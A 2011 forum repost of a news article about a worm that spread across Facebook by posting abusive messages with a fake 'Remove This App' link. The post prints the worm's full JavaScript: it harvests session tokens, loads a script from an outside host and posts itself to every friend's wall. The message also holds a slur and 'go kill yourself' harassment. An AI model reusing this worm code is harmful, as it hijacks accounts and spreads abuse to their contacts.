Nytro Posted May 12, 2011 Report Posted May 12, 2011 Script that gives hackers access to user accounts floods FacebookA widespread hack spread across Facebook early Thursday morning and shows no signs of abating as of yet. It comes in the form of a script that posts heavily profanity-laden wall posts continuously, instructing you that the only way to remove the posts is to click a ‘Remove This App’ link.Unfortunately the link is a hoax and allows the malicious script to access your Facebook account. Your account will then continue to spread the script in the form of similarly formatted wall posts on your friends accounts.The message uses the phrase ‘Vote for Nicole Santos’, leading some to believe that it is a high school prank related to Prom season.Here is a link (Fuck you faggot. Go kill yourself. Vote for Nicole Santos. I hate you and the only way to remove all these posts is by disabling this below. - Pastebin.com) to the raw code of the script causing the problems on Facebook. If any of you commenters have any suggestions as to how this might have been injected in the first place please do let us know.Script:var message = "Fuck you faggot. Go kill yourself. Vote for Nicole Santos. I hate you and the only way to remove all these posts is by disabling this below.";var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://dl.dropbox.com/u/10505629/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";var myText = "Remove This App";var post_form_id = document.getElementsByName('post_form_id')[0].value;var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var friends = new Array();gf = new XMLHttpRequest(); gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false); gf.send(); if(gf.readyState!=4){ }else{ data = eval('(' + gf.responseText.substr(9) + ')'); if(data.error){ }else{ friends = data.payload.entries.sort(function(a,{return a.index-b.index;}); }}for(var i=0; i<friends.length; i++){ var httpwp = new XMLHttpRequest(); var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1"; var paramswp = "&__d=1&app_id=6628568379&extern=0&" + "&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) + "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) + "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid + "&user_message=" + message; httpwp.open("POST", urlwp, true); httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); httpwp.setRequestHeader("Content-length", paramswp.length); httpwp.setRequestHeader("Connection", "keep-alive"); httpwp.onreadystatechange = function(){ if (httpwp.readyState == 4 && httpwp.status == 200){ } } httpwp.send(paramswp);}alert("Failed to remove. Go fuck yourself with a cactus.");document.location = "profile.php?id=100000583908715";Unsurprisingly many are trying to trace the source back to the ‘Nicole Santos’ that may have originated it, although it’s unclear whether this person would be the originator or just a victim of the hack.As of now the only solution seems to be not to click on the link or any link requiring that you ‘Verify you account to prevent spam’ as this may be how the hack gains access to your Facebook wall in the first place. Simply block the friend sending it to you as their account is now compromised. Once the problem has been fixed by Facebook you can re-enable them.We will continue to update you on the hack and it’s effects, check back with this post for more informationSursa: Script that gives hackers access to user accounts floods Facebook ! ~ THN : The Hackers News Quote
